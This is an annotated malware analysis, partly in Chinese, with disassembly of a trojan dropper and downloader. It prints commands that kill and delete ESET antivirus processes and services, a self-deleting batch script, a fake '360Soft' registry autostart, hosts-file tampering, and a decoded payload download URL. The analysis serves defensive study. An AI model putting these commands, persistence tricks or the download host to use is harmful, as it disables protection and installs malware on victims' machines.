00401C9C |. 68 00080000 push 800 ; |nBytesToWrite = 800 (2048.)  whole buffer, NUL padding included
00401CA1 |. 52 push edx ; |Buffer
00401CA2 |. 56 push esi ; |hFile
00401CA3 |. FF15 30104000 call dword ptr [401030] ; \WriteFile
00401CA9 |. 56 push esi ; /hObject
00401CAA |. FF15 64104000 call dword ptr [401064] ; \CloseHandle
00401CB0 |. 6A 00 push 0 ; nShowCmd = 0 (SW_HIDE)
00401CB2 |. 6A 00 push 0 ; lpDirectory = NULL
00401CB4 |. 8D4424 10 lea eax, dword ptr [esp+10] ; "kl78a.bat"
00401CB8 |. 68 E4104000 push 004010E4 ; lpParameters
00401CBD |. 50 push eax ; lpFile = "kl78a.bat"
00401CBE |. 68 C8124000 push 004012C8 ; open  (lpOperation)
00401CC3 |. 6A 00 push 0 ; hwnd = NULL
00401CC5 |. E8 76F7FFFF call <动态获得函数地址并运行文件> ; resolves shell32!ShellExecuteA at run time and forwards these six arguments
00401CCA |. 83C4 18 add esp, 18 ; cdecl: drop the six arguments
00401CCD |. 6A 00 push 0 ; /ExitCode = 0
00401CCF \. FF15 54104000 call dword ptr [401054] ; \ExitProcess
Bat内容:
0012EC48 40 65 63 68 6F 20 6F 66 66 0A 0D 40 65 63 68 6F @echo off..@echo
0012EC58 20 6B 6B 6C 66 61 3E 3E 31 31 2E 63 61 0A 0D 40 kklfa>>11.ca..@
0012EC68 65 63 68 6F 20 6B 6B 6C 66 61 3E 3E 31 31 2E 63 echo kklfa>>11.c
0012EC78 61 0A 0D 40 65 63 68 6F 20 6B 6B 6C 66 61 3E 3E a..@echo kklfa>>
0012EC88 31 31 2E 63 61 0A 0D 40 65 63 68 6F 20 6B 6B 6C 11.ca..@echo kkl
0012EC98 66 61 3E 3E 31 31 2E 63 61 0A 0D 40 65 63 68 6F fa>>11.ca..@echo
0012ECA8 20 6B 6B 6C 66 61 3E 3E 31 31 2E 63 61 0A 0D 40 kklfa>>11.ca..@
0012ECB8 65 63 68 6F 20 6B 6B 6C 66 61 3E 3E 31 31 2E 63 echo kklfa>>11.c
0012ECC8 61 0A 0D 40 65 63 68 6F 20 6B 6B 6C 66 61 3E 3E a..@echo kklfa>>
0012ECD8 31 31 2E 63 61 0A 0D 40 65 63 68 6F 20 6B 6B 6C 11.ca..@echo kkl
0012ECE8 66 61 3E 3E 31 31 2E 63 61 0A 0D 40 65 63 68 6F fa>>11.ca..@echo
0012ECF8 20 6B 6B 6C 66 61 3E 3E 31 31 2E 63 61 0A 0D 40 kklfa>>11.ca..@
0012ED08 65 63 68 6F 20 6B 6B 6C 66 61 3E 3E 31 31 2E 63 echo kklfa>>11.c
0012ED18 61 0A 0D 40 64 65 6C 20 31 31 2E 63 61 0A 0D 40 a..@del 11.ca..@
0012ED28 64 65 6C 20 22 43 3A 5C 74 72 6F 6A 61 6E 5C 74 del "C:\trojan\t
0012ED38 72 6F 6A 61 6E 5C 34 31 32 34 38 39 5F 66 6D 30 rojan\412489_fm0
0012ED48 31 2E 65 78 65 22 0A 0D 40 64 65 6C 20 6B 6C 37 1.exe"..@del kl7
0012ED58 38 61 2E 62 61 74 0A 0D 40 65 78 69 74 8a.bat..@exit
0012F3F0 63 6D 64 20 2F 63 20 73 63 20 64 65 6C 65 74 65 cmd /c sc delete
0012F400 20 65 6B 72 6E 00 00 00 63 6D 64 20 2F 63 20 74 ekrn...cmd /c t
0012F410 61 73 6B 6B 69 6C 6C 20 2F 69 6D 20 65 6B 72 6E askkill /im ekrn
0012F420 2E 65 78 65 20 2F 66 7C 63 6D 64 20 2F 63 20 74 .exe /f|cmd /c t
0012F430 61 73 6B 6B 69 6C 6C 20 2F 69 6D 20 65 67 75 69 askkill /im egui
0012F440 2E 65 78 65 20 2F 66 .exe /f
创建文件函数:这个函数被调用了三次,分别创建 44810500.dll、pcidump.sys、45757859.exe文件
; ---------------------------------------------------------------------------
; drop_resource_to_file(lpFileName, lpResourceName)   [stdcall, retn 8]
; Called three times by the dropper (44810500.dll, pcidump.sys,
; 45757859.exe). Creates lpFileName with CREATE_ALWAYS, locates a resource
; of the type held at [4012C4] in its own image, and writes it out one byte
; at a time after XOR-ing each byte with 06h. The plaintext payloads thus
; exist only as XOR-encoded resources inside the parent binary.
; In:   [arg.1] = file name to create, [arg.2] = resource name
; Out:  no meaningful value (eax holds whatever the last API returned)
; Locals: [local.1] = 4-byte resource-type value copied from [4012C4]
;         [local.2] = bytes-written scratch for WriteFile
;         [local.3] = file handle from CreateFileA
;         [ebp+B]   = one-byte write buffer
; ---------------------------------------------------------------------------
00401830 <41>/$ 55 push ebp
00401831 |. 8BEC mov ebp, esp
00401833 |. 83EC 0C sub esp, 0C ; three dword locals
00401836 |. 8B4D 08 mov ecx, [arg.1] ; ecx = lpFileName
00401839 |. A1 C4124000 mov eax, dword ptr [4012C4] ; resource type value, stored to local.1 below
0040183E |. 6A 00 push 0 ; /hTemplateFile = NULL
00401840 |. 6A 00 push 0 ; |Attributes = 0
00401842 |. 6A 02 push 2 ; |Mode = CREATE_ALWAYS  (overwrites an existing file)
00401844 |. 6A 00 push 0 ; |pSecurity = NULL
00401846 |. 6A 00 push 0 ; |ShareMode = 0
00401848 |. 68 00000040 push 40000000 ; |Access = GENERIC_WRITE
0040184D |. 51 push ecx ; |FileName
0040184E |. 8945 FC mov [local.1], eax ; |local.1 <- [4012C4]; its address is passed as lpType below
00401851 |. FF15 88104000 call dword ptr [401088] ; \CreateFileA
00401857 |. 85C0 test eax, eax ; creates the target file (44810500.dll on the first call). NOTE: CreateFileA signals failure with INVALID_HANDLE_VALUE (-1), not 0, so this test never takes the error path
00401859 |. 8945 F4 mov [local.3], eax ; local.3 = hFile
0040185C |. 0F84 82000000 je 004018E4
00401862 |. 8B45 0C mov eax, [arg.2] ; eax = lpResourceName
00401865 |. 53 push ebx
00401866 |. 56 push esi
00401867 |. 8D55 FC lea edx, [local.1]
0040186A |. 57 push edi ; locate the embedded resource
0040186B |. 52 push edx ; /ResourceType  (points at the 4 bytes in local.1 - presumably a short type string; confirm)
0040186C |. 50 push eax ; |ResourceName
0040186D |. 6A 00 push 0 ; |hModule = NULL  (own image)
0040186F |. FF15 40104000 call dword ptr [401040] ; \FindResourceA
00401875 |. 8BF8 mov edi, eax ; edi = HRSRC  (not checked for NULL)
00401877 |. 57 push edi ; /hResource
00401878 |. 6A 00 push 0 ; |hModule = NULL
0040187A |. FF15 3C104000 call dword ptr [40103C] ; \LoadResource
00401880 |. 50 push eax ; /nHandles
00401881 |. 8945 0C mov [arg.2], eax ; |arg.2 slot reused to keep the HGLOBAL for FreeResource
00401884 |. 33F6 xor esi, esi ; |esi = byte index
00401886 |. FF15 38104000 call dword ptr [401038] ; \SetHandleCount  (debugger label; the result is used as the resource data pointer, i.e. it behaves like LockResource - verify the import)
0040188C |. 8BD8 mov ebx, eax ; ebx = resource data
0040188E |. C645 0B 00 mov byte ptr [ebp+B], 0 ; one-byte write buffer
00401892 |. 90 nop
00401893 |. 57 push edi ; /hResource
00401894 |. 56 push esi ; |hModule => NULL
00401895 |. FF15 34104000 call dword ptr [401034] ; \SizeofResource
0040189B |. 85C0 test eax, eax
0040189D |. 74 2E je short 004018CD ; empty resource: nothing to write
0040189F |. 90 nop
004018A0 |> 8A0C33 /mov cl, byte ptr [ebx+esi] ; next encoded byte
004018A3 |. 8D55 F8 |lea edx, [local.2]
004018A6 |. 80F1 06 |xor cl, 6 ; decode: single-byte XOR key 06h
004018A9 |. 6A 00 |push 0 ; /pOverlapped = NULL
004018AB |. 884D 0B |mov byte ptr [ebp+B], cl ; |
004018AE |. 8B4D F4 |mov ecx, [local.3] ; |
004018B1 |. 52 |push edx ; |pBytesWritten
004018B2 |. 8D45 0B |lea eax, dword ptr [ebp+B] ; |
004018B5 |. 6A 01 |push 1 ; |nBytesToWrite = 1  (one WriteFile call per byte)
004018B7 |. 50 |push eax ; |Buffer
004018B8 |. 51 |push ecx ; |hFile
004018B9 |. FF15 30104000 |call dword ptr [401030] ; \WriteFile
004018BF |. 57 |push edi ; /hResource
004018C0 |. 6A 00 |push 0 ; |hModule = NULL
004018C2 |. 46 |inc esi ; |
004018C3 |. FF15 34104000 |call dword ptr [401034] ; \SizeofResource  (re-queried every iteration)
004018C9 |. 3BF0 |cmp esi, eax
004018CB |.^ 72 D3 \jb short 004018A0 ; while (index < size)
004018CD |> 8B55 0C mov edx, [arg.2]
004018D0 |. 52 push edx ; /hResource
004018D1 |. FF15 2C104000 call dword ptr [40102C] ; \FreeResource
004018D7 |. 8B45 F4 mov eax, [local.3]
004018DA |. 50 push eax ; /hObject
004018DB |. FF15 64104000 call dword ptr [401064] ; \CloseHandle
004018E1 |. 5F pop edi
004018E2 |. 5E pop esi
004018E3 |. 5B pop ebx
004018E4 |> 8BE5 mov esp, ebp ; the je above lands here, after the pops it skipped
004018E6 |. 5D pop ebp
004018E7 \. C2 0800 retn 8 ; stdcall, two arguments
动态获得函数地址并运行文件的函数:每次调用时 LoadLibraryA 加载的 dll 不一样(此处为 shell32.dll,取 ShellExecuteA),运行的文件也不一样。
; ---------------------------------------------------------------------------
; resolve_and_shellexecute(hwnd, lpOperation, lpFile, lpParameters,
;                          lpDirectory, nShowCmd)            [cdecl, 6 args]
; Loads shell32.dll at run time and resolves ShellExecuteA by name
; (presumably so the import table of the sample shows no reference to it).
; The six stack arguments are forwarded unchanged to the resolved function;
; the caller removes them afterwards (add esp,18).
; If GetProcAddress fails the function returns without FreeLibrary, so the
; module handle in esi is leaked on that path.
; Clobbers: eax, ecx, edx; preserves esi.
; ---------------------------------------------------------------------------
00401440 <41>/$ 56 push esi
00401441 |. 68 A0124000 push 004012A0 ; /shell32.dll\drivers\gm.dls\??\  (FileName = "shell32.dll"; the debugger shows the adjacent strings too)
00401446 |. FF15 A4104000 call dword ptr [4010A4] ; \LoadLibraryA
0040144C |. 8BF0 mov esi, eax ; esi = hModule, kept for FreeLibrary
0040144E |. 68 90124000 push 00401290 ; /ShellExecuteA
00401453 |. 56 push esi ; |hModule
00401454 |. FF15 A8104000 call dword ptr [4010A8] ; \GetProcAddress
0040145A |. 85C0 test eax, eax
0040145C |. 74 27 je short 00401485 ; not resolved: skip the call (and the FreeLibrary)
0040145E |. 8B4C24 1C mov ecx, dword ptr [esp+1C] ; arg6 = nShowCmd
00401462 |. 8B5424 18 mov edx, dword ptr [esp+18] ; arg5 = lpDirectory
00401466 |. 51 push ecx
00401467 |. 8B4C24 18 mov ecx, dword ptr [esp+18] ; arg4 = lpParameters  (same offset because esp moved by 4)
0040146B |. 52 push edx
0040146C |. 8B5424 18 mov edx, dword ptr [esp+18] ; arg3 = lpFile
00401470 |. 51 push ecx
00401471 |. 8B4C24 18 mov ecx, dword ptr [esp+18] ; arg2 = lpOperation
00401475 |. 52 push edx
00401476 |. 8B5424 18 mov edx, dword ptr [esp+18] ; arg1 = hwnd
0040147A |. 51 push ecx
0040147B |. 52 push edx
0040147C |. FFD0 call eax ; shell32.ShellExecuteA - on this run it launched C:\WINDOWS\temp\Explorer.exe
0040147E |. 56 push esi ; /hLibModule
0040147F |. FF15 B0104000 call dword ptr [4010B0] ; \FreeLibrary
00401485 |> 5E pop esi
00401486 \. C3 retn
44810500.dll文件分析,主要作用结束一些常见的杀毒软件进程
功能在testall函数中实现
; ---------------------------------------------------------------------------
; 44810500.testall - exported entry of the dropped DLL.
; Only wraps the worker at 10002600, called with a single NULL argument
; (the following "pop ecx" discards it, i.e. cdecl caller clean-up).
; The process-killing / AV-hijacking behaviour described above lives in the
; callee, not here.
; ---------------------------------------------------------------------------
100026B0 44810500.testall /$ 6A 00 push 0 ; argument for 10002600 = NULL
100026B2 |. E8 49FFFFFF call 10002600 这个是关键call,有兴趣的同学可以自己分析文件
100026B7 |. 59 pop ecx ; drop the pushed argument
100026B8 \. C3 retn
100026B9 90 nop
100026BA 90 nop
100026BB 90 nop
100026BC 90 nop
100026BD 90 nop
100026BE 90 nop
100026BF 90 nop
; ---------------------------------------------------------------------------
; 44810500.<ModuleEntry> - DllMain(hinstDLL, fdwReason, lpReserved)
; [stdcall, retn 0C]
; Runs the routine at 10002560 unconditionally, then stores the DLL's own
; path in the global buffer at 100029BC via GetModuleFileNameA and returns
; TRUE. fdwReason ([esp+8]) is never examined, so 10002560 executes on every
; DllMain notification (process/thread attach and detach alike).
; ---------------------------------------------------------------------------
100026C0 44810500.<ModuleE>/$ E8 9BFEFFFF call 10002560 ; effects not visible in this listing
100026C5 |. 8B4424 04 mov eax, dword ptr [esp+4] ; eax = hinstDLL
100026C9 |. 68 FF000000 push 0FF ; /BufSize = FF (255.)
100026CE |. 68 BC290010 push 100029BC ; |PathBuffer = 44810500.100029BC  (global; holds the DLL's own path afterwards)
100026D3 |. 50 push eax ; |hModule
100026D4 |. FF15 78100010 call dword ptr [<&KERNEL32.GetModuleFileName>; \GetModuleFileNameA
100026DA |. B8 01000000 mov eax, 1 ; return TRUE
100026DF \. C2 0C00 retn 0C
45757859.exe文件分析,此文件主要下载木马并运行
; ---------------------------------------------------------------------------
; 45757859.exe entry routine (downloader component)
; 1. CreateMutexA("XETTETT......"); if GetLastError == 0B7h
;    (ERROR_ALREADY_EXISTS) return 0 so only one instance runs.
; 2. call 1: enable SeDebugPrivilege; call 2: copy wininet.dll to %TEMP%
;    and resolve the WinINet API; call 3: write the Run autostart value.
; 3. Start thread 1 (WFP-dialog hider, not waited for), thread 2 (hosts
;    file replacement) and thread 3 (info beacon), each waited at most
;    1000 ms, then call 4 (download/run payloads). Returns 0.
; The thread handles returned by CreateThread are never closed.
; Locals: [local.1], [local.2] receive the thread ids of threads 2 and 3.
; esi is 0 throughout and supplies every NULL/FALSE argument.
; ---------------------------------------------------------------------------
00400F39 457578>/$ 55 push ebp
00400F3A |. 8BEC mov ebp, esp
00400F3C |. 51 push ecx ; reserve [local.1]
00400F3D |. 51 push ecx ; reserve [local.2]
00400F3E |. 56 push esi
00400F3F |. 33F6 xor esi, esi ; 1. create mutex "XETTETT......"; if it already exists, exit so the sample does not run twice
00400F41 |. 68 D4074000 push 004007D4 ; /MutexName = "XETTETT......"
00400F46 |. 56 push esi ; |InitialOwner => FALSE
00400F47 |. 56 push esi ; |pSecurity => NULL
00400F48 |. FF15 50044000 call dword ptr [<&KERNEL32.CreateMutexA>] ; \CreateMutexA
00400F4E |. FF15 40044000 call dword ptr [<&KERNEL32.GetLastError>] ; [GetLastError
00400F54 |. 3D B7000000 cmp eax, 0B7 ; ERROR_ALREADY_EXISTS
00400F59 |. 75 04 jnz short 00400F5F
00400F5B |. 33C0 xor eax, eax ; second instance: return 0
00400F5D |. EB 60 jmp short 00400FBF
00400F5F |> 53 push ebx
00400F60 |. 57 push edi
00400F61 |. E8 45FCFFFF call 00400BAB ; call 1: enable SeDebugPrivilege for this process
00400F66 |. E8 EAFCFFFF call 00400C55 ; call 2: copy wininet.dll to %TEMP% and resolve the network API addresses
00400F6B |. E8 F8020000 call 00401268 ; call 3: write the autostart registry value
00400F70 |. 8B3D 4C044000 mov edi, dword ptr [<&KERNEL32.CreateThread>>; kernel32.CreateThread
00400F76 |. 56 push esi ; /pThreadId
00400F77 |. 56 push esi ; |CreationFlags
00400F78 |. 56 push esi ; |pThreadParm
00400F79 |. 68 F10E4000 push 00400EF1 ; |ThreadFunction = thread 1 (hides the Windows File Protection dialog)
00400F7E |. 56 push esi ; |StackSize
00400F7F |. 56 push esi ; |pSecurity
00400F80 |. FFD7 call edi ; \CreateThread  (handle discarded; the thread runs unattended)
00400F82 |. 8D45 FC lea eax, [local.1]
线程1遍历窗口,如果发现"Windows 文件保护"窗口,隐藏WINDOWS文件保护窗口
00400F85 |. 50 push eax ; /pThreadId
00400F86 |. 56 push esi ; |CreationFlags
00400F87 |. 56 push esi ; |pThreadParm
00400F88 |. 68 7D114000 push 0040117D ; |ThreadFunction = thread 2 (replaces the hosts file)
00400F8D |. 56 push esi ; |StackSize
00400F8E |. 56 push esi ; |pSecurity
00400F8F |. FFD7 call edi ; \CreateThread
00400F91 |. 8B1D 48044000 mov ebx, dword ptr [<&KERNEL32.WaitForSingle>; kernel32.WaitForSingleObject
00400F97 |. 68 E8030000 push 3E8 ; /Timeout = 1000. ms
00400F9C |. 50 push eax ; |hObject
00400F9D |. FFD3 call ebx ; \WaitForSingleObject  (gives thread 2 up to 1 s, then continues regardless)
00400F9F |. 8D45 F8 lea eax, [local.2]
00400FA2 |. 50 push eax ; /pThreadId
00400FA3 |. 56 push esi ; |CreationFlags
00400FA4 |. 56 push esi ; |pThreadParm
00400FA5 |. 68 FF0F4000 push 00400FFF ; |ThreadFunction = thread 3 (collects system info and beacons it)
00400FAA |. 56 push esi ; |StackSize
00400FAB |. 56 push esi ; |pSecurity
00400FAC |. FFD7 call edi ; \CreateThread
00400FAE |. 68 E8030000 push 3E8 ; /Timeout = 1000. ms
00400FB3 |. 50 push eax ; |hObject
00400FB4 |. FFD3 call ebx ; \WaitForSingleObject
00400FB6 |. E8 BC030000 call 00401377 ; call 4: download and run the payload list
00400FBB |. 5F pop edi
00400FBC |. 33C0 xor eax, eax ; return 0
00400FBE |. 5B pop ebx
00400FBF |> 5E pop esi
00400FC0 |. C9 leave
00400FC1 \. C3 retn
call 1
; ---------------------------------------------------------------------------
; enable_sedebugprivilege()   [call 1 of 45757859.exe]
; Opens the current process token with TOKEN_QUERY|TOKEN_ADJUST_PRIVILEGES
; and enables SeDebugPrivilege via AdjustTokenPrivileges. The
; TOKEN_PRIVILEGES structure is assembled in the locals:
;   [local.5]           = PrivilegeCount = 1
;   [local.4]/[local.3] = LUID filled in by LookupPrivilegeValueA
;   [local.2]           = Attributes = 2 (SE_PRIVILEGE_ENABLED)
; The results of LookupPrivilegeValueA and AdjustTokenPrivileges are not
; checked, and the token handle in [local.1] is never closed.
; Out: eax = last API result (AdjustTokenPrivileges BOOL, or 0 when
;      OpenProcessToken failed).
; ---------------------------------------------------------------------------
00400BAB /$ 55 push ebp
00400BAC |. 8BEC mov ebp, esp
00400BAE |. 83EC 14 sub esp, 14 ; 5 dword locals: token handle + TOKEN_PRIVILEGES
00400BB1 |. FF15 7C044000 call dword ptr [<&KERNEL32.GetCurrentProcess>; [GetCurrentProcess
00400BB7 |. 8D4D FC lea ecx, [local.1]
00400BBA |. 51 push ecx ; /phToken
00400BBB |. 6A 28 push 28 ; |DesiredAccess = TOKEN_QUERY|TOKEN_ADJUST_PRIVILEGES
00400BBD |. 50 push eax ; |hProcess
00400BBE |. FF15 04044000 call dword ptr [<&ADVAPI32.OpenProcessToken>>; \OpenProcessToken
00400BC4 |. 85C0 test eax, eax
00400BC6 |. 74 33 je short 00400BFB ; no token: leave with eax = 0
00400BC8 |. 8D45 F0 lea eax, [local.4] ; &Luid inside the TOKEN_PRIVILEGES block
00400BCB |. 56 push esi
00400BCC |. 50 push eax ; /pLocalId
00400BCD |. 33F6 xor esi, esi ; |esi = 0, reused for every NULL/FALSE below
00400BCF |. 68 00074000 push 00400700 ; |Privilege = "SeDebugPrivilege"
00400BD4 |. 56 push esi ; |SystemName => NULL
00400BD5 |. FF15 00044000 call dword ptr [<&ADVAPI32.LookupPrivilegeVa>; \LookupPrivilegeValueA  (result ignored)
00400BDB |. 56 push esi ; /pRetLen => NULL
00400BDC |. 56 push esi ; |pPrevState => NULL
00400BDD |. 8D45 EC lea eax, [local.5] ; |&TOKEN_PRIVILEGES
00400BE0 |. 56 push esi ; |PrevStateSize => 0
00400BE1 |. 50 push eax ; |pNewState
00400BE2 |. 56 push esi ; |DisableAllPrivileges => FALSE
00400BE3 |. FF75 FC push [local.1] ; |hToken
00400BE6 |. C745 EC 0100000>mov [local.5], 1 ; |PrivilegeCount = 1
00400BED |. C745 F8 0200000>mov [local.2], 2 ; |Attributes = SE_PRIVILEGE_ENABLED
00400BF4 |. FF15 14044000 call dword ptr [<&ADVAPI32.AdjustTokenPrivil>; \AdjustTokenPrivileges
00400BFA |. 5E pop esi
00400BFB |> C9 leave
00400BFC \. C3 retn
Call 2
00400C55 /$ 55 push ebp
00400C56 |. 8BEC mov ebp, esp
00400C58 |. 81EC 08020000 sub esp, 208
00400C5E |. 56 push esi
00400C5F |. 8D85 FCFEFFFF lea eax, [local.65]
00400C65 |. 57 push edi
00400C66 |. BE 04010000 mov esi, 104
00400C6B |. 50 push eax ; /Buffer
00400C6C |. 56 push esi ; |BufSize => 104 (260.)
00400C6D |. FF15 24044000 call dword ptr [<&KERNEL32.GetTempPathA>] ; \GetTempPathA
00400C73 |. 8D85 FCFEFFFF lea eax, [local.65]
00400C79 |. 50 push eax ; /TempName
00400C7A |. 6A 00 push 0 ; |Unique = 0
00400C7C |. 8D85 FCFEFFFF lea eax, [local.65] ; |
00400C82 |. 68 70074000 push 00400770 ; |Prefix = "open"
00400C87 |. 50 push eax ; |Path
00400C88 |. FF15 20044000 call dword ptr [<&KERNEL32.GetTempFileNameA>>; \GetTempFileNameA
00400C8E |. 8D85 F8FDFFFF lea eax, [local.130]
00400C94 |. 56 push esi ; /BufSize => 104 (260.)
00400C95 |. 50 push eax ; |Buffer
00400C96 |. FF15 1C044000 call dword ptr [<&KERNEL32.GetSystemDirector>; \GetSystemDirectoryA
00400C9C |. 8D85 F8FDFFFF lea eax, [local.130]
00400CA2 |. 68 60074000 push 00400760 ; /StringToAdd = "\wininet.dll"
00400CA7 |. 50 push eax ; |ConcatString
00400CA8 |. FF15 44044000 call dword ptr [<&KERNEL32.lstrcatA>] ; \lstrcatA
00400CAE |. 8D85 FCFEFFFF lea eax, [local.65]
00400CB4 |. 6A 00 push 0 ; /FailIfExists = FALSE
00400CB6 |. 50 push eax ; |NewFileName = "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ope14F.tmp"
00400CB7 |. 8D85 F8FDFFFF lea eax, [local.130] ; |
00400CBD |. 50 push eax ; |ExistingFileName = "C:\WINDOWS\system32\wininet.dll"
00400CBE |. FF15 70044000 call dword ptr [<&KERNEL32.CopyFileA>] ; \CopyFileA
00400CC4 |. 8D85 FCFEFFFF lea eax, [local.65] ; 将%SystemRoot%\system32\wininet.dll复制到%TEMP%
00400CCA |. 50 push eax ; /FileName
00400CCB |. FF15 74044000 call dword ptr [<&KERNEL32.LoadLibraryA>] ; \LoadLibraryA
00400CD1 |. 8BF8 mov edi, eax
00400CD3 |. 85FF test edi, edi
00400CD5 |. 74 4A je short 00400D21 ; 下面获得网络相关函数地址
00400CD7 |. 8B35 78044000 mov esi, dword ptr [<&KERNEL32.GetProcAddres>; kernel32.GetProcAddress
00400CDD |. 68 50074000 push 00400750 ; /ProcNameOrOrdinal = "InternetOpenA"
00400CE2 |. 57 push edi ; |hModule
00400CE3 |. FFD6 call esi ; \GetProcAddress
Call 3
00401318 |. 50 push eax ; /\src = "scvhost.exe"
00401319 |. 8D85 B8FEFFFF lea eax, [local.82] ; |
0040131F |. 50 push eax ; |dest = "C:\WINDOWS\system32\"
00401320 |. E8 7B0E0000 call <jmp.&MSVCRT.strcat> ; \strcat
00401325 |. 83C4 10 add esp, 10
00401328 |. 8D45 F0 lea eax, [local.4]
0040132B |. 50 push eax ; /pHandle
0040132C |. 8D85 B4FDFFFF lea eax, [local.147] ; |
00401332 |. 50 push eax ; |Subkey
00401333 |. 68 02000080 push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
00401338 |. FF15 10044000 call dword ptr [<&ADVAPI32.RegCreateKeyA>] ; \RegCreateKeyA
0040133E |. 5F pop edi
0040133F |. 5E pop esi
00401340 |. 85C0 test eax, eax
00401342 |. 75 28 jnz short 0040136C
00401344 |. 8D85 B8FEFFFF lea eax, [local.82]
0040134A |. 50 push eax ; / /s = "C:\WINDOWS\system32\scvhost.exe"
0040134B |. E8 060E0000 call <jmp.&MSVCRT.strlen> ; \strlen
00401350 |. 59 pop ecx ; 写入启动项
00401351 |. 40 inc eax
00401352 |. 50 push eax ; /BufSize
00401353 |. 8D85 B8FEFFFF lea eax, [local.82] ; |
00401359 |. 50 push eax ; |Buffer
0040135A |. 6A 01 push 1 ; |ValueType = REG_SZ
0040135C |. 6A 00 push 0 ; |Reserved = 0
0040135E |. 68 28084000 push 00400828 ; |ValueName = "360Soft"
00401363 |. FF75 F0 push [local.4] ; |hKey
00401366 |. FF15 0C044000 call dword ptr [<&ADVAPI32.RegSetValueExA>] ; \RegSetValueExA
0040136C |> FF75 F0 push [local.4] ; /hKey
0040136F |. FF15 08044000 call dword ptr [<&ADVAPI32.RegCloseKey>] ; \RegCloseKey
Call 4
00401377 /$ B8 35224000 mov eax, 00402235
0040137C |. E8 6F0E0000 call 004021F0
00401381 |. 81EC 58070000 sub esp, 758
00401387 |. 53 push ebx
00401388 |. 56 push esi
00401389 |. BE FF000000 mov esi, 0FF
0040138E |. 33DB xor ebx, ebx
00401390 |. 56 push esi ; /n => FF (255.)
00401391 |. 8D85 2CFDFFFF lea eax, [local.181] ; |
00401397 |. 53 push ebx ; |c => 00
00401398 |. 50 push eax ; |s
00401399 |. 895D E4 mov [local.7], ebx ; |
0040139C |. 895D DC mov [local.9], ebx ; |
0040139F |. 895D EC mov [local.5], ebx ; |
004013A2 |. 895D E8 mov [local.6], ebx ; |
004013A5 |. 895D E0 mov [local.8], ebx ; |
004013A8 |. E8 B50D0000 call <jmp.&MSVCRT.memset> ; \memset
004013AD |. 56 push esi ; /n
004013AE |. 8D85 9CF9FFFF lea eax, [local.409] ; |
004013B4 |. 53 push ebx ; |c
004013B5 |. 50 push eax ; |s
004013B6 |. E8 A70D0000 call <jmp.&MSVCRT.memset> ; \memset
004013BB |. 56 push esi ; /n
004013BC |. 8D85 9CFAFFFF lea eax, [local.345] ; |
004013C2 |. 53 push ebx ; |c
004013C3 |. 50 push eax ; |s
004013C4 |. E8 990D0000 call <jmp.&MSVCRT.memset> ; \memset
004013C9 |. 56 push esi ; /n
004013CA |. 8D85 9CF8FFFF lea eax, [local.473] ; |
004013D0 |. 53 push ebx ; |c
004013D1 |. 50 push eax ; |s
004013D2 |. E8 8B0D0000 call <jmp.&MSVCRT.memset> ; \memset
004013D7 |. 68 90010000 push 190 ; /n = 190 (400.)
004013DC |. 8D85 9CFBFFFF lea eax, [local.281] ; |
004013E2 |. 53 push ebx ; |c
004013E3 |. 50 push eax ; |s
004013E4 |. E8 790D0000 call <jmp.&MSVCRT.memset> ; \memset
004013E9 |. 8D85 2CFDFFFF lea eax, [local.181]
004013EF |. 68 68054000 push 00400568 ; /src = "H7CX26h`Ez[aUpvgNT6X2{SToTrRoISXIasuW62gqDOhJjeWVfoeWCCC"
004013F4 |. 50 push eax ; |dest
004013F5 |. E8 6E0D0000 call <jmp.&MSVCRT.strcpy> ; \strcpy
004013FA |. 83C4 44 add esp, 44
004013FD |. 8D85 9CF9FFFF lea eax, [local.409]
00401403 |. 50 push eax
00401404 |. 8D85 2CFDFFFF lea eax, [local.181]
0040140A |. 50 push eax ; /s
0040140B |. E8 460D0000 call <jmp.&MSVCRT.strlen> ; \strlen
00401410 |. 59 pop ecx
00401411 |. 50 push eax
00401412 |. 8D85 2CFDFFFF lea eax, [local.181]
00401418 |. 50 push eax
00401419 |. E8 15F7FFFF call <解密函数>
0040141E |. 8D85 9CFAFFFF lea eax, [local.345]
00401424 |. 50 push eax
00401425 |. 8D85 9CF9FFFF lea eax, [local.409]
0040142B |. 50 push eax
0040142C |. E8 5DF5FFFF call 0040098E ; 0012F81C 0012FA40 ASCII "NB2ODo6X8iwyiy2OHT3izbIdR+aMlxaMFx0PjgAA"
00401431 |. 8D85 9CF8FFFF lea eax, [local.473]
00401437 |. 50 push eax
00401438 |. 8D85 9CFAFFFF lea eax, [local.345]
0040143E |. 50 push eax
0040143F |. E8 F7F5FFFF call 00400A3B ; 字符处理出http://ad.ittz.net:72/ad.txt
00401444 |. 8D85 9CF8FFFF lea eax, [local.473]
0040144A |. 50 push eax ; /src
0040144B |. 8D85 9CFBFFFF lea eax, [local.281] ; |
00401451 |. 50 push eax ; |dest
00401452 |. E8 110D0000 call <jmp.&MSVCRT.strcpy> ; \strcpy
00401457 |. 8D85 9CFBFFFF lea eax, [local.281]
0040145D |. 50 push eax ; /s
0040145E |. E8 F30C0000 call <jmp.&MSVCRT.strlen> ; \strlen
00401463 |. 83C4 28 add esp, 28
00401466 |. 85C0 test eax, eax
00401468 |. 77 07 ja short 00401471
0040146A |. 33C0 xor eax, eax
0040146C |. E9 DD010000 jmp 0040164E
00401471 |> 8B35 4C044000 mov esi, dword ptr [<&KERNEL32.CreateThread>>; kernel32.CreateThread
00401477 |. 57 push edi
00401478 |. BF A11B4000 mov edi, 00401BA1
0040147D |> 8D85 2CFEFFFF /lea eax, [local.117]
00401483 |. 50 |push eax ; /Buffer
00401484 |. 68 04010000 |push 104 ; |BufSize = 104 (260.)
00401489 |. FF15 24044000 |call dword ptr [<&KERNEL32.GetTempPathA>] ; \GetTempPathA
0040148F |. 8D85 2CFEFFFF |lea eax, [local.117]
00401495 |. 50 |push eax ; /TempName
00401496 |. 53 |push ebx ; |Unique
00401497 |. 8D85 2CFEFFFF |lea eax, [local.117] ; |
0040149D |. 68 70074000 |push 00400770 ; |Prefix = "open"
004014A2 |. 50 |push eax ; |Path = "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\"
004014A3 |. FF15 20044000 |call dword ptr [<&KERNEL32.GetTempFileNameA>; \GetTempFileNameA
004014A9 |> 8D85 2CFEFFFF |/lea eax, [local.117]
004014AF |. 50 ||push eax
004014B0 |. 8D85 9CFBFFFF ||lea eax, [local.281] ; 0012F830 0012FDD0 ASCII "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ope153.tmp"
